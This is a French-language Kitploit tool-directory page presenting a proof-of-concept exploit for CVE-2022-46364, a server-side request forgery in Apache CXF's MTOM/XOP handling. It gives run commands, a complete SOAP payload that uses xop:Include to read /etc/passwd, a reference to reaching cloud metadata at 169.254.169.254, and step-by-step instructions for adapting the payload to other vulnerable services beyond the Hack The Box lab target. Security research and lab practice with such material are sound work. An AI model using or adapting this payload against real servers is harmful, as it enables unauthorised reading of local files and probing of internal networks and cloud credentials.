Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/c0gnit00/cve-2022-46364
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubc0gnit00/cve-2022-46364

CVE-2022-46364

Preuve de concept d'exploit pour CVE-2022-46364, une vulnérabilité SSRF dans Apache CXF permettant des lectures de fichiers arbitraires et du sondage de réseau interne via des requêtes SOAP MTOM/XOP falsifiées.

Voir le dépôt
1il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-46364 — Apache CXF MTOM/XOP SSRF (Lecture de fichier)

Preuve de concept pour CVE-2022-46364 — une vulnérabilité de falsification de requête côté serveur (SSRF) dans Apache CXF lors du traitement des requêtes MTOM/XOP.


Résumé de la vulnérabilité

CVE-2022-46364 affecte les versions d'Apache CXF antérieures à 3.4.10 et 3.5.5. Lorsque MTOM (Message Transmission Optimization Mechanism) est activé sur un service SOAP, le décodeur CXF valide incorrectement l'attribut href dans les éléments <xop:Include>. Au lieu de limiter href aux URI cid: (comme l'exige la spécification XOP du W3C), CXF déréférence des URI arbitraires — y compris file://, http://, et https://.

Cela permet à un attaquant non authentifié de :

  • Lire des fichiers locaux arbitraires (file:///etc/passwd)
  • Effectuer une SSRF contre des services internes (http://169.254.169.254/)
  • Potentiellement atteindre des points de terminaison de métadonnées cloud ou des API internes

Cible

Ce PoC a été écrit et testé contre la machine Hack The Box :

Point de terminaison cible : http://devarea.htb:8080/employeeservice

Mais de petites modifications dans la charge utile XML selon le WSDL cible le rendent adaptable à l'environnement cible.


Utilisation

Lire /etc/passwd (cible par défaut)

L'URL par défaut est http://devarea.htb:8080/employeeservice.

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd

URL cible personnalisée

root@kitploit:~
python3 CVE-2022-46364.py --url http://target:8080/employeeservice --file /etc/passwd

Mode verbeux — afficher la requête et la réponse brute

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd --verbose

Adaptation à d'autres cibles

Important : Ce script est codé en dur pour la structure WSDL de DevArea (HTB). Pour l'utiliser contre un autre service Apache CXF vulnérable, vous devez modifier la charge utile SOAP à l'intérieur de build_payload() pour correspondre au contrat WSDL de la cible.

Étapes d'adaptation

  1. Récupérer le WSDL depuis la cible :

    root@kitploit:~
    curl http://target:8080/employeeservice?wsdl
    
  2. Identifier les détails du service :

    • targetNamespace (par ex. http://devarea.htb/)
    • Nom de l'opération (par ex. submitReport)
    • Structure des paramètres (par ex. <arg0> avec <content> imbriqué)
  3. Modifier la charge utile dans build_payload() :

    • Mettre à jour l'espace de noms (xmlns:dev="...")
    • Mettre à jour le nom de l'opération (<dev:submitReport>)
    • Mettre à jour l'enveloppe du paramètre (<arg0>)
    • Placer <xop:Include href="file://{filepath}"/> dans un champ que le serveur traitera comme une pièce jointe
  4. Mettre à jour --url lors de l'exécution du script.

Exemple d'adaptation WSDL

Étant donné cet extrait WSDL :

root@kitploit:~
<wsdl:definitions targetNamespace="http://example.com/">
  <wsdl:operation name="uploadDocument">
    <wsdl:input message="tns:uploadDocument"/>
  </wsdl:operation>
</wsdl:definitions>

Votre charge utile devrait devenir :

root@kitploit:~
<soapenv:Envelope xmlns:soapenv="..." xmlns:ex="http://example.com/" xmlns:xop="...">
  <soapenv:Body>
    <ex:uploadDocument>
      <document>
        <xop:Include href="file:///etc/passwd"/>
      </document>
    </ex:uploadDocument>
  </soapenv:Body>
</soapenv:Envelope>

Fonctionnement

  1. Le script crée une requête HTTP multipart/related avec Content-Type: application/xop+xml.
  2. À l'intérieur du corps SOAP, un élément <xop:Include href="file:///etc/passwd"/> est placé.
  3. Le serveur CXF vulnérable traite cela comme une référence de pièce jointe et déréférence l'URI file://.
  4. Le contenu du fichier est lu, encodé en base64 par le serveur, et renvoyé dans l'élément SOAP <return>.
  5. Le script extrait la chaîne base64 après Content: et la décode.

Références

RessourceLien
Apache CXF AdvisoryCVE-2022-46364
NVD EntryNVD — CVE-2022-46364
Apache Jira (CXF-8706)CXF-8706
W3C XOP SpecificationXML-binary Optimized Packaging
Penligent Deep DiveCVE-2022-46364 PoC in Practice
HTB DevAreaHack The Box — DevArea

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Obtenez toujours une autorisation explicite avant de tester des systèmes que vous ne possédez pas. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script.


Licence

Licence MIT — n'hésitez pas à l'utiliser, le modifier et le partager avec les crédits appropriés.

Télécharger l’outil